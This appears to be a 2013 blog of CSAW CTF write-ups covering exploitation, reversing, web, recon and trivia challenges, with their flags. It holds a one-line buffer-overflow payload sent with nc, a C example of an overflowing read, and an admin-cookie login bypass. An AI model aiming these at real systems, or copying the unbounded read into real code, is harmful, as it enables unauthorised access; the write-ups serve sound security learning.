Wednesday, September 25, 2013

CSAW CTF 2013 - Exploitation100

Exploitation 1 - 100 Points
exploit1
exploit1.c

We were given an ELF32 executable and a code snippet of its handle() function in this challenge:

Our objective is to change the backdoor value to 1, so that the key to this challenge will be read and sent back to us.

The buffer[] array is defined with a size of 1016 bytes. However, the recv() call reads 1020 bytes into buffer[], a classic buffer overflow. So we did what came naturally:

$ python -c "print 'A'*1020" | nc 128.238.66.212 31337

Voila!
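The overflow described above, as an added example that is not the challenge's exploit1.c (whose snippet is only an image here): a model of handle()'s frame with the 1016-byte buffer and the backdoor flag, the 1020-byte read beside the bounded one. frame, fake_recv and demo are constructed names, and since the page does not show how the binary tests backdoor, the example only reports the value the read leaves in it.

```c
#include <stddef.h>
#include <string.h>

/* Model of handle()'s stack frame from the write-up: the 1016-byte buffer
 * with the backdoor flag right after it. A struct guarantees the adjacency;
 * a real compiler may lay stack locals out differently. (Constructed.) */
struct frame {
    char buffer[1016];
    int  backdoor;
};

/* Stand-in for recv(): copies up to `want` bytes of the client's payload
 * into dst, byte by byte, exactly as many as the caller asked for. */
static size_t fake_recv(char *dst, size_t want, const char *payload, size_t len) {
    size_t n = len < want ? len : want;
    for (size_t i = 0; i < n; i++)
        dst[i] = payload[i];
    return n;
}

/* Vulnerable pattern: asks for 1020 bytes into a 1016-byte buffer, so the
 * last 4 bytes of the payload land on backdoor. Returns what it now holds. */
int handle_vulnerable(const char *payload, size_t len) {
    struct frame f = {{0}, 0};
    fake_recv(f.buffer, 1020, payload, len);   /* 1020 > sizeof f.buffer */
    return f.backdoor;
}

/* Hardened: the read size is tied to the buffer, so backdoor stays 0
 * no matter how much the client sends. */
int handle_fixed(const char *payload, size_t len) {
    struct frame f = {{0}, 0};
    fake_recv(f.buffer, sizeof f.buffer, payload, len);
    return f.backdoor;
}

/* Runs the write-up's payload (1020 x 'A') through one of the handlers. */
int demo(int hardened) {
    char payload[1020];
    memset(payload, 'A', sizeof payload);
    return hardened ? handle_fixed(payload, sizeof payload)
                    : handle_vulnerable(payload, sizeof payload);
}
```

With the 'A' payload the vulnerable handler leaves 0x41414141 in backdoor, which is why any non-zero check on it passes; the bounded read leaves it at 0.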

Tuesday, September 24, 2013

CSAW CTF 2013 - Reversing200 (CSAW Reversing 2013 2)

CSAW Reversing 2013 2 - 200 Points

csaw2013reversing2.exe

Yet another Win32 executable. Let's run it, annnnd it crashes :/
Load it in OllyDbg and you should see:

A decryption loop!

Right after the decryption loop, where the flag will be shown in a message box, the flag text is actually stored in ESI, so let's dump the value of ESI while we are in the decryption loop:

Flag: number2isalittlebitharder:p

CSAW CTF 2013 - Reversing100 (CSAW Reversing 2013 1)

CSAW Reversing 2013 1 - 100 Points

csaw2013reversing1.exe

We were given a Win32 executable in this challenge; let's run it:

Oops... Let's load it in a debugger

So there is a call to IsDebuggerPresent that causes junk to be displayed instead of the flag.

Flag: this1isprettyeasy:)

CSAW CTF 2013 - Reversing100 (DotNet)

DotNet - 100 Points

DotNetReversing.exe

DotNet is a .NET executable. Let's decompile it:

To solve this challenge, one must supply the correct value of num so that num3 comes out as 6553563335L. XOR, as we know, is reversible, so:

num ^ num2 = num3

We can get the value of num by performing:

num = num3 ^ num2

num = 13371337255

Now we run the executable with 13371337255 as the argument:

Flag: I'll create a GUI interface using visual basic...see if I can track an IP address.

Monday, September 23, 2013

CSAW CTF 2013 - Web100

Guess Harder - 100 Points

http://128.238.66.215

The URL gave us a login page. The objective of this challenge was to log in as admin. Using the Burp proxy (or any cookie editor), something interesting showed up:

This challenge can be solved by setting the admin cookie to true, as shown above. And... voila!

Flag: told_ya_you_wouldnt_guess_it

CSAW CTF 2013 - Recon

There were 8 recon challenges. We solved 6 of them; the exceptions were Alexander Taylor (fuzyll) and Jordan Wiens (psifertex). Most of the recon challenges were solved with the assistance of Tommy. Each challenge in this category was worth 100 points.

Julian Cohen

> Google his handle (HockeyInJune)
> Click on Wikipedia user page

> Visit his "new website"; there was nothing except a picture of a washing machine with a big mouth
> Run dig on the URL and get the IP address.

> Voila!

Flag: 1a8024a820bdc7b31b79a2d3a9ae7c02

Kevin Chung

> Hint given was "What places can you graduate from?"
> Start with his high school, Staten Island Technical High School
> First few Google results were about CSAW High School Forensics previous winners
> Clicking on Kevin's name brings us to key.txt

Flag: who_in_the_world_is_kevin_chung

historypeats

> Googling "historypeats" gives multiple results, including a GitHub profile
> The most recent activity of historypeats was removing comments from historypeats/putscan
> The removed comment was actually the flag

Flag: whatDidtheF0xSay?

CSAW CTF 2013 - Trivia

There were 5 trivia questions, each flag worth 50 points:

#1 - Drink all the booze, ____ all the things!

Flag: hack

#2 - What is the abbreviation of the research published in the Hackin9 issue on nmap by Jon Oberheide, Nico Waisman, Matthieu Suiche, Chris Valasek, Yarochkin Fyodor, the Grugq, Jonathan Brossard, and Mark Dowd?

Flag: DICKS

#3 - What is the common name for a single grouping of instructions used in a Return Oriented Programming payload, typically ending in a return (ret) instruction?

Flag: gadget

#4 - What is the new web technology that provides a web browser full-duplex communication to a web server over a single connection?

Flag: websocket

#5 - What is the x86 processor operating mode for running 64-bit code?

Flag: long mode